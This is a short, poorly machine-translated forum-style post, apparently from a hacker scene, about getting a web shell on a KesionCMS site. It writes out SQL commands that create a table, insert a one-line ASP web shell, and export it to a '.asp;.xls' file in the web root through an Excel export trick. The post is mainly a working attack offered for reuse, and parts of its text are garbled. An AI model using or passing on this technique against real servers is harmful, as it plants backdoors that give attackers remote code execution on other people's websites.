Some time ago Ghost brother, made a kesion arbitrary download vulnerability on the holding shell further generations. In fact, take the shell was very simple. Method of much is. Just a brother to me get a shell, I just made a to get the shell methods for your reference.
The point of sql command execution.
create table 0ldgui (a varchar(5 0)) create a table\
insert into 0ldgui (a) values ('<%execute request("0ldgui")%>') to insert the phrase
select * into [a] in 'f:/web/0ldgui.asp;. xls' 'excel 4.0;' from 0ldgui export, in the database backup you can see the absolute path
Very common a asp sql to get the shell method